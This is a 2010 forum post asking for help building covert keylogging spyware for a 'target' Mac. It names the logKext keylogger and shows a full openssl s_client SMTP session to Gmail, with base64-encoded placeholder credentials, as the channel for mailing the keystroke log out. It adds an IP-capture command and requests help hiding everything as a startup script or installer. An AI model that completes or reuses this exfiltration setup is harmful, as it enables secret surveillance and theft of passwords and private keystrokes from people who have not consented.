casio
Posted June 30, 2010

Hello Everybody.

Let me just say right off that I am not a Mac person. However, I am trying to program a keylog/IP mailer tied into OS X's kernel.

The logger installed on the target machine is: code.google.com/p/logkext/

logKext is the best free open source key logger for OS X.

I've set the logKext file to unencrypted for now, and I'm trying to attach the file in an email via openssl s_client.

Under "334 VXNlcm5hbWU6" is your email "example@gmail.com" converted to base64, and under "334 UGFzc3dvcmQ6" is your password "examplePASSWORD" converted to base64.

base64 encoder tool here: http://www.motobit.com/util/base64-decoder-encoder.asp

    $ openssl s_client -crlf -connect smtp.gmail.com:465
    CONNECTED(00000003)
    depth=1 /C=US/O=Google Inc/CN=Google Internet Authority
    verify error:num=20:unable to get local issuer certificate
    verify return:0
    ---
    Certificate chain
     0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
       i:/C=US/O=Google Inc/CN=Google Internet Authority
     1 s:/C=US/O=Google Inc/CN=Google Internet Authority
       i:/C=US/O=Equifax/OU=Equifax Secure Certificate Authority
    ---
    Server certificate
    subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
    issuer=/C=US/O=Google Inc/CN=Google Internet Authority
    ---
    No client certificate CA names sent
    ---
    SSL handshake has read 1711 bytes and written 309 bytes
    ---
    New, TLSv1/SSLv3, Cipher is RC4-MD5
    Server public key is 1024 bit
    Secure Renegotiation IS supported
    Compression: NONE
    Expansion: NONE
    SSL-Session:
        Protocol  : TLSv1
        Cipher    : RC4-MD5
        Session-ID: 22C21C4D84A0D9649906F6EB8775B94F44504EA733C3DE62F752C5FB69412649
        Session-ID-ctx:
        Master-Key: 956F05DD954AB363CA629C57CA5B389829D0DF33D1FF5F6E19698AC4FEDF9DA02EE12E15D0835D1B083CB88E20F7F66C
        Key-Arg   : None
        Start Time: 1277702327
        Timeout   : 300 (sec)
        Verify return code: 20 (unable to get local issuer certificate)
    ---
    220 mx.google.com ESMTP h8sm4265622ibk.3
    helo
    250 mx.google.com at your service
    auth login
    334 VXNlcm5hbWU6
    ZXhhbXBsZUBnbWFpbC5jb20=
    334 UGFzc3dvcmQ6
    ZXhhbXBsZVBBU1NXT1JE
    235 2.7.0 Accepted
    mail from:<example@gmail.com>
    250 2.1.0 OK h8sm4265622ibk.3
    rcpt to:<example@gmail.com>
    250 2.1.5 OK h8sm4265622ibk.3
    data
    354 Go ahead h8sm4265622ibk.3
    Subject: test
    hello test
    .
    250 2.0.0 OK 1277702414 h8sm4265622ibk.3

The '.' -period- after the space sends the email.

Have not yet figured out how to add an attachment, which would include the unencrypted logKext file... I am assuming it will have to be in MIME format or converted to base64?

Also thought it would be easy enough to add an IP mailer to this:

    $ hostname | nslookup >> /whatEVERfolderYOUwant/test.txt

Any help at all with how to tie this all together as a startup script or in an installer app would be really helpful.

Preferably this would be tied into the OS X architecture as a startup script or a running Perl process or something, and not an AppleScript, but really any help/suggestions/advice would be greatly appreciated.

Also, bear in mind what I am trying to accomplish here is assuming you have physical access to the machine.